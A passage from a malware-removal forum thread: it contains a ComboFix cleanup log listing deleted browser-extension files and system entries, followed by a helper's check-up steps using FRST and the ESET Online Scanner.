c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Ice\AppData\Local\datos.txt
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Ice\AppData\Local\Temp\_MEI29882\_ctypes.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\_elementtree.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\_hashlib.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\_multiprocessing.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\_socket.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\_ssl.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\hashobjs_ext.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\pyexpat.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\pysqlite2._sqlite.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\python27.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\pythoncom27.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\PyWinTypes27.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\select.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\unicodedata.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32api.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32com.shell.shell.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32crypt.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32event.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32file.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32gui.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32inet.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32pdh.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32pipe.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32process.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32profile.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32security.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\win32ts.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\windows._lib_cacheinvalidation.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._animate.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._controls_.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._core_.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._gdi_.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._html2.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._misc_.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._windows_.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wx._wizard.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxbase294u_net_vc90.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxbase294u_vc90.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxmsw294u_adv_vc90.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxmsw294u_core_vc90.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxmsw294u_html_vc90.dll
c:\users\Ice\AppData\Local\Temp\_MEI29882\wxmsw294u_webview_vc90.dll
.
.
(((((((((((((((((((((((((   Files Created from 2014-07-03 to 2014-08-03  )))))))))))))))))))))))))))))))
.
.
2014-08-03 02:52 . 2014-08-03 02:52    --------    d-----w-    c:\windows\ERUNT
2014-08-03 02:51 . 2014-08-03 02:51    12872    ----a-w-    c:\windows\system32\bootdelete.exe
2014-08-03 02:41 . 2014-08-03 02:41    --------    d-----w-    c:\users\Ice\AppData\Local\CrashDumps
2014-08-03 02:34 . 2014-08-03 04:24    29160    ----a-w-    c:\windows\SysWow64\drivers\TrueSight.sys
2014-08-03 02:34 . 2014-08-03 02:34    --------    d-----w-    c:\programdata\RogueKiller
2014-08-03 01:40 . 2014-08-03 09:11    --------    d-----w-    C:\FRST
2014-08-03 00:30 . 2010-08-30 13:34    536576    ----a-w-    c:\windows\SysWow64\sqlite3.dll
2014-08-03 00:26 . 2014-08-03 00:26    --------    d-----w-    c:\program files\HitmanPro
2014-08-03 00:26 . 2014-08-03 01:21    --------    d-----w-    c:\programdata\HitmanPro
2014-08-03 00:24 . 2014-08-03 04:18    --------    d-----w-    C:\AdwCleaner
2014-08-02 22:21 . 2014-08-03 10:07    122584    ----a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-02 22:20 . 2014-08-02 22:20    --------    d-----w-    c:\program files (x86)\Malwarebytes Anti-Malware
2014-08-02 22:20 . 2014-05-12 12:26    63704    ----a-w-    c:\windows\system32\drivers\mwac.sys
2014-08-02 22:20 . 2014-05-12 12:26    91352    ----a-w-    c:\windows\system32\drivers\mbamchameleon.sys
2014-08-02 22:06 . 2014-08-03 08:15    --------    d-----w-    c:\users\Ice\AppData\Roaming\Lavasoft
2014-08-02 21:59 . 2014-08-02 21:59    --------    d-----w-    c:\programdata\BitDefender
2014-08-02 21:55 . 2014-08-02 21:55    --------    d-----w-    c:\program files\Lavasoft
2014-08-01 04:32 . 2014-08-01 04:32    --------    d-----w-    c:\programdata\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-08-01 04:32 . 2014-08-01 04:32    --------    d-----w-    c:\program files\iTunes
2014-08-01 04:32 . 2014-08-01 04:32    --------    d-----w-    c:\program files (x86)\iTunes
2014-08-01 04:32 . 2014-08-01 04:32    --------    d-----w-    c:\program files\iPod
2014-08-01 04:30 . 2014-08-01 04:30    --------    d-----w-    c:\program files\Bonjour
2014-08-01 04:30 . 2014-08-01 04:30    --------    d-----w-    c:\program files (x86)\Bonjour
2014-07-23 20:29 . 2014-08-02 21:45    --------    d-----w-    c:\programdata\1d41b52c7ef528a8
2014-07-23 20:29 . 2014-07-23 20:29    --------    d-----w-    c:\users\Ice\AppData\Local\Packages
2014-07-23 20:29 . 2014-07-23 20:29    --------    d-----w-    c:\users\Ice\AppData\Local\Comodo
2014-07-23 20:29 . 2014-07-23 20:29    --------    d-----w-    c:\users\HomeGroupUser$
2014-07-23 20:29 . 2014-07-23 20:29    --------    d-----w-    c:\users\Guest
2014-07-23 20:29 . 2014-07-23 20:29    --------    d-----w-    c:\users\Administrator
2014-07-17 15:07 . 2014-07-17 15:07    --------    d-----w-    c:\programdata\Riot Games
2014-07-12 06:26 . 2014-07-12 06:27    --------    d-----w-    c:\program files (x86)\Awakening - The Sunhook Spire
2014-07-12 03:37 . 2014-07-12 03:37    --------    d-----w-    c:\users\Ice\AppData\Roaming\Rainbow
2014-07-12 02:03 . 2014-07-12 02:04    --------    d-----w-    c:\program files (x86)\Awakening - The Skyward Castle
2014-07-12 02:02 . 2014-07-12 02:02    --------    d-----w-    c:\users\Ice\AppData\Roaming\Digital Quarter
2014-07-12 01:57 . 2014-07-12 01:57    --------    d-----w-    c:\program files (x86)\Awakening - The Goblin Kingdom
2014-07-12 00:45 . 2014-07-12 00:45    --------    d-----w-    c:\users\Ice\AppData\Roaming\Nevosoft
2014-07-11 20:44 . 2014-07-11 20:44    --------    d-----w-    c:\users\Ice\AppData\Roaming\LestaStudio
2014-07-11 17:16 . 2014-07-11 17:16    --------    d-----w-    c:\users\Ice\AppData\Roaming\northern_tale_bfg_en
2014-07-11 14:36 . 2014-07-11 14:36    --------    d-----w-    c:\program files (x86)\Awakening - Moonfell Wood
2014-07-11 14:35 . 2014-07-11 14:36    --------    d-----w-    c:\program files (x86)\Amulet of Time - Shadow of la Rochelle
2014-07-11 14:34 . 2014-07-11 14:35    --------    d-----w-    c:\program files (x86)\Awakening Kingdoms
2014-07-11 14:32 . 2014-07-11 14:32    --------    d-----w-    c:\program files (x86)\Northern Tale
2014-07-11 14:31 . 2014-07-11 14:32    --------    d-----w-    c:\program files (x86)\Royal Envoy 3
2014-07-11 14:24 . 2014-07-11 14:25    --------    d-----w-    c:\program files (x86)\Dark Manor - A Hidden Object Mystery
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-08-03 10:06 . 2010-06-24 16:33    23256    ----a-w-    c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-07-09 01:39 . 2013-06-08 01:57    699056    ----a-w-    c:\windows\SysWow64\FlashPlayerApp.exe
2014-07-09 01:39 . 2011-08-19 00:08    71344    ----a-w-    c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-05-12 12:25 . 2014-02-22 23:03    25816    ----a-w-    c:\windows\system32\drivers\mbam.sys
2014-05-07 20:02 . 2014-05-29 16:20    98216    ----a-w-    c:\windows\SysWow64\WindowsAccessBridge-32.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"GoogleDriveSync"="c:\program files (x86)\Google\Drive\googledrivesync.exe" [2014-06-27 24477056]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2010-11-21 1475584]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-07-08 152392]
.
c:\users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
CurseClientStartup.ccip [2014-7-6 0]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HitmanPro37Crusader]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HitmanPro37CrusaderBoot]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 DAUpdaterSvc;Dragon Age: Origins - Content Updater;c:\program files (x86)\Dragon Age\bin_ship\DAUpdaterSvc.Service.exe;c:\program files (x86)\Dragon Age\bin_ship\DAUpdaterSvc.Service.exe [x]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files (x86)\McAfee Security Scan\3.8.150\McCHSvc.exe;c:\program files (x86)\McAfee Security Scan\3.8.150\McCHSvc.exe [x]
R3 PCDSRVC{1E208CE0-FB7451FF-06020101}_0;PCDSRVC{1E208CE0-FB7451FF-06020101}_0 - PCDR Kernel Mode Service Helper Driver;c:\program files\dell support center\pcdsrvc_x64.pkms;c:\program files\dell support center\pcdsrvc_x64.pkms [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [x]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]
S3 AtiHDAudioService;AMD Function Driver for HD Audio Service;c:\windows\system32\drivers\AtihdW76.sys;c:\windows\SYSNATIVE\drivers\AtihdW76.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys;c:\windows\SYSNATIVE\drivers\MBAMSwissArmy.sys [x]
S3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
S3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\system32\Drivers\RtsUStor.sys;c:\windows\SYSNATIVE\Drivers\RtsUStor.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - MBAMSWISSARMY
*NewlyCreated* - WS2IFSL
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-03 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2013-06-08 01:39]
.
2014-07-27 c:\windows\Tasks\PCDoctorBackgroundMonitorTask.job
- c:\program files\Dell Support Center\uaclauncher.exe [2011-03-22 17:20]
.
2014-08-02 c:\windows\Tasks\SystemToolsDailyTest.job
- c:\program files\Dell Support Center\pcdrcui.exe [2011-03-22 17:20]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveBlacklistedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}]
2014-06-27 19:20    777032    ----a-w-    c:\program files (x86)\Google\Drive\googledrivesync64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedEditOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}]
2014-06-27 19:20    777032    ----a-w-    c:\program files (x86)\Google\Drive\googledrivesync64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedViewOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}]
2014-06-27 19:20    777032    ----a-w-    c:\program files (x86)\Google\Drive\googledrivesync64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}]
2014-06-27 19:20    777032    ----a-w-    c:\program files (x86)\Google\Drive\googledrivesync64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncingOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}]
2014-06-27 19:20    777032    ----a-w-    c:\program files (x86)\Google\Drive\googledrivesync64.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
mStart Page = about:blank
mLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://www.google.com
uInternet Settings,ProxyOverride = *.local
TCP: DhcpNameServer = 75.75.75.75 75.75.76.76
FF - ProfilePath - c:\users\Ice\AppData\Roaming\Mozilla\Firefox\Profiles\rxekvrwp.default-1407025147172\
FF - prefs.js: browser.startup.homepage - hxxps://www.google.com/search?q=weather+willowbrook%2C+il&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a&channel=sb
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
Toolbar-Locked - (no file)
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PCDSRVC{1E208CE0-FB7451FF-06020101}_0]
"ImagePath"="\??\c:\program files\dell support center\pcdsrvc_x64.pkms"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.14"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\McAfee]
"SymbolicLinkValue"=hex(6):5c,00,72,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
   00,5c,00,6d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files (x86)\Malwarebytes Anti-Malware\mbam.exe
c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
.
**************************************************************************
.
Completion time: 2014-08-03  05:10:38 - machine was rebooted
ComboFix-quarantined-files.txt  2014-08-03 10:10
.
Pre-Run: 738,763,202,560 bytes free
Post-Run: 738,986,741,760 bytes free
.
- - End Of File - - EC08C4D9619C8EA27228361BB175F04A
 



#6 icelore

icelore
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  • Local time:03:43 PM

Posted 03 August 2014 - 05:20 AM

Whatever ComboFix did, I'm not getting the MalwareBytes warning for the attempted connection, nor do I see any of the processes active...thus far at least.  *fingers crossed*

 

Is that it?  o.o



#7 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  • Gender:Male
  • Local time:10:43 PM

Posted 03 August 2014 - 06:08 AM

Let's do a check-up.
Make sure that these dllhost.exe processes aren't active before executing step 1.


Step 1

Please download the attached file fixlist.txt (252 bytes) and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administrator privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!



Step 3

Start FRST with administrator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#8 icelore (Topic Starter, Members, 5 posts)

